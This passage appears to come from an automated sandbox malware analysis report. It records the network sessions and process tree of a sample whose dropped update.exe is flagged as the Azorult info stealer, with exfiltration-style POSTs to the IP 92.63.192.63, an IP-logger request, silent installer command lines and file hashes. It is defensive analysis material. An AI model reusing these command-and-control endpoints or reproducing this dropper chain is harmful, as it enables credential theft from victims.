Data Ascii: sLNJadijm+UTIMg97xrdJ/vogIz2VKanJZYsOCyuT4E2BOxBwnZI4DF8gJlEN9KusolsL20HS3SgTVn1jw4cFPvPzsnWasQLzviAFnVBMzyDZX1aFQtfxkoE+T3eA7npbeGbRdDURgvhjRaQlxXMo6+G+lnhgf7RtItyby+gi3ZJS2IKaogYbY2pSgXkMinTcXHFC5D7Vw4HxFH17eIhsnWY8kfJ7u0d2hj+f8nt7CQk1g1yP53
Jan 2, 2025 02:28:18.354367971 CET | 1236 | IN | Data Raw: 63 7a 4c 77 49 63 41 61 39 31 51 68 46 57 52 55 34 43 4e 5a 75 4f 4a 4d 43 59 54 70 5a 38 4a 72 41 68 46 64 5a 58 49 65 44 48 46 77 44 4b 6a 43 71 36 37 4c 55 59 74 55 67 2b 47 62 5a 63 4b 56 75 53 7a 58 6f 2b 31 44 4d 49 33 63 38 47 6b 63 38 43
Data Ascii: czLwIcAa91QhFWRU4CNZuOJMCYTpZ8JrAhFdZXIeDHFwDKjCq67LUYtUg+GbZcKVuSzXo+1DMI3c8Gkc8CtWMeCXHfqWkCBwFONfj+e8Efkbvr3iyDlrhk6Js6OPrGb+/PGChmYTGhxmYAPl83wTh+epIaOhapX+rfFmrv2Nm5nK7lg9eFopqI7hQliPKbLOnZj8v4uPgom/+mJWNWqY55Sgw+praOMsZ12VIbw/3hi6uw5p8Fr
Jan 2, 2025 02:28:18.354384899 CET | 1236 | IN | Data Raw: 53 66 6a 6c 51 38 53 59 6f 43 74 32 79 34 58 33 47 78 6e 49 4c 47 38 39 58 31 47 67 75 2f 6f 64 6f 4d 77 30 51 55 4b 31 73 42 75 38 45 76 42 4f 56 2f 6f 33 2b 30 2b 31 5a 4e 51 77 77 39 44 36 65 30 41 30 6c 53 6c 69 70 42 4a 6e 4a 6b 55 6e 67 73
Data Ascii: SfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQww9D6e0A0lSlipBJnJkUngsCKkGzp/bNySclk1Xm+qrlis2QdHgdFNWTUIXPt0O5MLkngvcMg8D6mNU/9ygWoTjbWsSOXdL5wWbcpC9aIoG6nAkjzCqLKR+HBuHylDpluJaZqbZXo72SNGWNro3MLzVvj4jOfMvqi5KkuYuS4uS3GocKC3wbkgRa
Jan 2, 2025 02:28:18.354397058 CET | 1236 | IN | Data Raw: 50 6b 7a 72 49 41 73 61 39 39 38 6d 43 6e 43 63 4c 46 4f 65 35 38 7a 37 47 58 47 53 68 61 62 4b 65 50 34 59 35 4c 71 71 32 47 51 58 2f 62 38 33 55 6c 31 55 4c 6b 43 67 62 2b 62 41 2b 34 2f 64 76 44 6e 67 75 75 45 32 69 4e 39 75 59 4c 77 69 41 74
Data Ascii: PkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NUnKDYklspQQRo7QbL7xJCvEYIzPgQm2sAYY2jwGgWqwbn+WTK8srF1z6lAEJQnY85vwl/Xsj8znSZdR7ajSm+y2FdmJ5BuTR17hAfKfocJQXncIy9CGtuEMHhomzkx+XJYd
Jan 2, 2025 02:28:18.354413033 CET | 1120 | IN | Data Raw: 62 30 2f 77 70 51 4b 2b 62 5a 68 39 35 72 52 6f 74 63 50 62 32 4d 43 6c 73 39 37 42 73 6f 57 5a 68 76 56 42 41 45 64 34 42 48 37 73 79 64 54 63 56 61 2f 6d 78 70 62 6b 62 4c 75 54 54 6a 4e 63 68 2f 4b 53 32 46 45 4c 67 70 48 67 70 6d 31 59 4e 7a
Data Ascii: b0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxmr93PePLKFUqkhQzFll4ZgguVKJsfIJHMn6fCoxWaT5Tx6rBeTZtDoG6B9dEoi9KUb6TBYGU0g+/ZY
Jan 2, 2025 02:28:18.359052896 CET | 1236 | IN | Data Raw: 43 34 69 5a 53 37 66 47 6b 57 76 6b 6f 68 6d 64 71 57 7a 56 61 59 51 57 54 73 73 46 6c 65 52 32 67 65 43 79 70 75 76 49 4a 46 59 49 39 55 66 48 47 52 4e 4c 36 58 38 38 6b 64 45 2f 4e 38 54 76 4f 79 34 48 48 30 4c 35 52 38 46 35 62 6b 37 69 68 47
Data Ascii: C4iZS7fGkWvkohmdqWzVaYQWTssFleR2geCypuvIJFYI9UfHGRNL6X88kdE/N8TvOy4HH0L5R8F5bk7ihGQf26u6MNF3HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxr
Jan 2, 2025 02:28:18.599812031 CET | 160 | OUT | POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 92.63.192.63
Content-Length: 6077
Cache-Control: no-cache
Jan 2, 2025 02:28:18.818167925 CET | 345 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.20.2
Date: Thu, 02 Jan 2025 01:28:18 GMT
Content-Type: text/html
Content-Length: 145
Connection: close
Location: http://92.63.192.63/index.html
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49866 | 92.63.192.63 | 80 | 6332 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 02:28:18.824256897 CET | 162 | OUT | GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 92.63.192.63
Cache-Control: no-cache
Connection: Keep-Alive
Jan 2, 2025 02:28:19.514457941 CET | 241 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 02 Jan 2025 01:28:19 GMT
Content-Type: text/html
Content-Length: 15793
Last-Modified: Wed, 19 Jan 2022 11:10:18 GMT
Connection: keep-alive
ETag: "61e7f19a-3db1"
Accept-Ranges: bytes
Jan 2, 2025 02:28:19.514727116 CET | 1236 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22
Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Jan 2, 2025 02:28:19.514739037 CET | 1236 | IN | Data Raw: 43 4e 44 51 77 52 6b 4e 45 52 6a 45 78 52 54 5a 42 52 6a 55 31 4f 45 5a 42 4d 6b 4a 47 51 30 45 32 52 6a 49 30 49 6a 34 67 50 48 68 74 63 45 31 4e 4f 6b 52 6c 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62
Data Ascii: CNDQwRkNERjExRTZBRjU1OEZBMkJGQ0E2RjI0Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3
Jan 2, 2025 02:28:19.514755011 CET | 1236 | IN | Data Raw: 37 44 43 6f 61 68 47 37 30 6a 45 53 77 64 30 6e 52 4f 42 45 66 38 39 41 65 52 50 74 71 4a 49 6f 47 49 65 30 4e 62 6b 7a 37 62 4a 30 71 57 54 6a 53 34 4c 4f 52 7a 45 6c 5a 51 67 4d 6b 66 50 77 72 73 65 67 55 4c 61 53 53 4c 48 42 6d 41 59 38 36 32
Data Ascii: 7DCoahG70jESwd0nROBEf89AeRPtqJIoGIe0Nbkz7bJ0qWTjS4LORzElZQgMkfPwrsegULaSSLHBmAY862upET1q5LZOiQfgC+jvOMVo6gUE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwY
Jan 2, 2025 02:28:19.514765024 CET | 1236 | IN | Data Raw: 6d 43 56 34 67 79 6f 5a 4c 47 78 65 43 4a 4e 48 39 70 5a 45 78 63 79 70 77 74 62 74 73 48 7a 57 6a 76 72 45 68 6a 57 6d 62 73 75 74 74 4b 66 74 4c 7a 70 39 4e 59 4a 56 42 76 76 77 6c 5a 63 2b 46 7a 35 61 37 6b 57 6d 36 6f 73 73 44 57 38 55 35 4b
Data Ascii: mCV4gyoZLGxeCJNH9pZExcypwtbtsHzWjvrEhjWmbsuttKftLzp9NYJVBvvwlZc+Fz5a7kWm6ossDW8U5Kd15D0s8MNb9Oi2nCxOn0juliIH64uYyJOO7Uo2OycJnrEL8L/VB5nRbxRltKRvfkq3TDHGh0ttfomyUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVe
Jan 2, 2025 02:28:19.514776945 CET | 1236 | IN | Data Raw: 50 5a 53 64 37 63 30 59 58 47 67 4d 74 79 6f 5a 41 34 41 36 75 56 43 56 58 46 68 32 4d 5a 6d 4c 6d 52 54 4e 30 54 68 65 71 75 34 53 55 72 44 4b 79 76 4f 6b 76 42 53 56 33 4f 43 36 2b 7a 4b 62 77 4a 59 56 31 64 51 75 4d 6b 6c 58 6a 46 72 51 56 48
Data Ascii: PZSd7c0YXGgMtyoZA4A6uVCVXFh2MZmLmRTN0Thequ4SUrDKyvOkvBSV3OC6+zKbwJYV1dQuMklXjFrQVHLIL3mm7AtfFZtITmvurTXWOeaT4wIFywRCdslFT5IuLsiEQOIB+lVX98PEd3cOjvrHhcSZmXrSywcXMyZT/vFBUZvojgYMrscMLoMPVMqu5wBXcTlaSFxjfi6PA6MSm6gqii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6
Jan 2, 2025 02:28:19.514789104 CET | 1236 | IN | Data Raw: 75 77 64 51 64 57 2f 4b 49 4c 43 6a 50 4f 4f 42 44 49 6c 59 30 32 69 76 74 6e 6e 57 7a 31 4c 59 52 74 44 69 79 38 46 51 71 2f 5a 53 45 48 4b 43 30 6d 64 30 43 45 56 71 4b 77 72 55 4d 66 59 78 75 35 37 39 78 4d 66 50 75 6f 4e 47 75 68 75 66 41 36
Data Ascii: uwdQdW/KILCjPOOBDIlY02ivtnnWz1LYRtDiy8FQq/ZSEHKC0md0CEVqKwrUMfYxu579xMfPuoNGuhufA66C3QDDC930L3kSC555M3U2zwYwZ12EKw3xSgdFzNbtpz6pB8MmyMcLRPXtVUh/DBQW9AftlqeW5DT3dufcXQlljNo6ImCHXtDmMae6Gay7yEKV/c0QWjTcCE1iCVzYgxB+Nj8M0u2nPqqHw38i9juuWp5dHdCOWjU
Jan 2, 2025 02:28:19.514863968 CET | 1236 | IN | Data Raw: 71 61 6c 67 76 4a 2f 4f 2f 59 37 34 32 56 2f 70 57 74 67 31 48 47 73 61 35 33 4e 4a 51 66 4c 2f 35 6f 34 75 72 72 52 6a 36 61 64 4a 38 2f 2f 45 4d 37 7a 41 75 5a 64 72 67 6c 55 78 6a 70 76 50 4a 6c 41 38 36 61 36 59 6d 6d 68 63 49 32 68 66 68 7a
Data Ascii: qalgvJ/O/Y742V/pWtg1HGsa53NJQfL/5o4urrRj6adJ8//EM7zAuZdrglUxjpvPJlA86a6YmmhcI2hfhz8cNvOsv0PfwDC4y5Pa8paX9wh37G3omKs7LXGuWjS5KUARza327IZp3BqUsFCT1Kq5k6Gp0WppjevW+ntANpVKc6OjaL8PHVLT/RbvLoUxrHKm3WzDF4jh8T5/M9f5U2OzdPD+EoMpRYLRTq0ab84kj+5aRy5Cc3g
Jan 2, 2025 02:28:19.514875889 CET | 1236 | IN | Data Raw: 58 4d 6e 53 56 70 2b 4c 34 43 73 61 68 6d 46 6a 6a 46 62 4b 44 6d 73 33 78 2b 31 70 36 64 67 6a 46 2f 47 6a 2b 39 6d 62 71 6a 76 7a 50 31 78 62 30 33 74 33 52 4b 45 43 59 33 47 74 33 5a 4f 6f 32 7a 36 30 6c 52 34 46 52 73 6d 72 63 5a 33 48 2f 6d
Data Ascii: XMnSVp+L4CsahmFjjFbKDms3x+1p6dgjF/Gj+9mbqjvzP1xb03t3RKECY3Gt3ZOo2z60lR4FRsmrcZ3H/mzib6AKNIy19h25GSdXr8w28P2WYu6aT8enibbz/yxErG0XEd3EWS7ae5VPcqAS6h3IoMLEZKae6boXbPFYNAmdWHWLo3CnzXpHt04w+AexdW4HVxIy5LswOggLgc8HaTBkPkyxeHAVG81g1OM+nPo7uDZqTqZ19CX
                                                                                                          Jan 2, 2025 02:28:19.514887094 CET332INData Raw: 59 35 62 77 4d 34 52 44 47 70 32 57 73 70 74 34 79 4a 2b 73 78 4a 35 51 4b 39 35 2f 4d 4e 45 49 57 77 42 2b 69 37 2f 73 56 54 7a 48 56 75 70 7a 7a 57 68 62 41 66 76 73 58 31 6d 6c 70 41 63 2f 78 33 76 72 73 6e 4e 43 65 61 4c 78 5a 63 36 56 50 55
                                                                                                          Data Ascii: Y5bwM4RDGp2Wspt4yJ+sxJ5QK95/MNEIWwB+i7/sVTzHVupzzWhbAfvsX1mlpAc/x3vrsnNCeaLxZc6VPUQLbCCk4/DkmQY4KQZ2u2U1TorBwgMuy0buIRYDgSu/7eNKcA9b3OFXyj+dimjZunKg2Dlf1W5tMTCwbpcuELB4BP2bYy2TVeIjx/TlokUXZSIocDre5ryHIPov3oFiYU5lphZTMd5j6yhOz4Lu8QAo9pZf+tmfnG4
                                                                                                          Jan 2, 2025 02:28:19.519337893 CET1236INData Raw: 43 34 69 5a 53 37 66 47 6b 57 76 6b 6f 68 6d 64 71 57 7a 56 61 59 51 57 54 73 73 46 6c 65 52 32 67 65 43 79 70 75 76 49 4a 46 59 49 39 55 66 48 47 52 4e 4c 36 58 38 38 6b 64 45 2f 4e 38 54 76 4f 79 34 48 48 30 4c 35 52 38 46 35 62 6b 37 69 68 47
                                                                                                          Data Ascii: C4iZS7fGkWvkohmdqWzVaYQWTssFleR2geCypuvIJFYI9UfHGRNL6X88kdE/N8TvOy4HH0L5R8F5bk7ihGQf26u6MNF3HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxr


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.4 | 49730       | 104.21.79.229  | 443              | 6816 | C:\Users\user\Desktop\ETVk1yP43q.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-02 01:27:06 UTC | 146               | OUT       | GET /1dHC37 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 2no.co
2025-01-02 01:27:06 UTC | 1058              | IN        | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 01:27:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
memory: 0.35894012451171875
expires: Thu, 02 Jan 2025 01:27:06 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FDvvXZrrZzr0pol4aDEbgVCVTfiiAGToSMjVaqr8nrJx6Yvvt0Umwao6ky9BpHeHb2RIZTCbW02XKQ2L91tyYrn0Bt1WRWJXxI4NyfwCf4imB%2FED7Izqmw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb6f6f7f83cf78f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1630&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=760&delivery_rate=1696687&cwnd=137&unsent_bytes=0&cid=340b99d4f0c4459e&ts=517&x=0"


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.4 | 49732       | 172.217.16.212 | 443              | 3848 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-02 01:27:10 UTC | 441               | OUT       | GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-453A430160CEF13230B9413C30A336AE-BDBEC76D9EE81A8CBE827F8B10FCC2A4&vrs=3.0.0.505&prg=explorer&uid=5153dce68ee7dc529e3ee1aac6d1b34a HTTP/1.1
User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
Host: neosoft-activator.appspot.com
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-02 01:27:12 UTC | 300               | IN        | HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain;charset=utf-8
X-Cloud-Trace-Context: fd5e4ce48ec25e727745082fe2a637a2
Date: Thu, 02 Jan 2025 01:27:12 GMT
Server: Google Frontend
Content-Length: 500
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close



Target ID: 0
Start time: 20:26:57
Start date: 01/01/2025
Path: C:\Users\user\Desktop\ETVk1yP43q.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ETVk1yP43q.exe"
Imagebase: 0x3e0000
File size: 8'302'080 bytes
MD5 hash: 56ECF4355112DCD2F73E04D0D1784178
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 20:27:03
Start date: 01/01/2025
Path: C:\Users\user\AppData\Roaming\cexplorer.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Imagebase: 0x400000
File size: 6'860'752 bytes
MD5 hash: B2E5A8FE3CA4F0CD681B5662F972EA5F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 2%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 20:27:03
Start date: 01/01/2025
Path: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Imagebase: 0x400000
File size: 1'185'824 bytes
MD5 hash: 729BC0108BCD7EC083DFA83D7A4577F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 3%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 20:27:05
Start date: 01/01/2025
Path: C:\Users\user\AppData\Roaming\update.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\update.exe"
Imagebase: 0x400000
File size: 700'768 bytes
MD5 hash: 912B031EAEE45A05000F7DE4E9B734BC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:
• Detection: 100%, Avira
• Detection: 79%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 20:27:05
Start date: 01/01/2025
Path: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
Imagebase: 0x400000
File size: 15'091'304 bytes
MD5 hash: 92A3D0847FC622B31F2D0C273A676C0E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

Target ID: 8
Start time: 20:27:14
Start date: 01/01/2025
Path: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Wow64 process (32bit): false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:20:27:16
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:10
                                                                                                          Start time:20:27:18
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:11
                                                                                                          Start time:20:27:18
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:20:27:20
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
                                                                                                          Imagebase:0x400000
                                                                                                          File size:146'536 bytes
                                                                                                          MD5 hash:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:15
                                                                                                          Start time:20:27:27
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:20:27:30
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:20:27:30
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:20:27:36
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:20:27:36
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:20:27:44
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:21
                                                                                                          Start time:20:27:47
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline: C:\Users\user\AppData\Roaming\update.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:700'768 bytes
                                                                                                          MD5 hash:912B031EAEE45A05000F7DE4E9B734BC
                                                                                                          Has elevated privileges:true
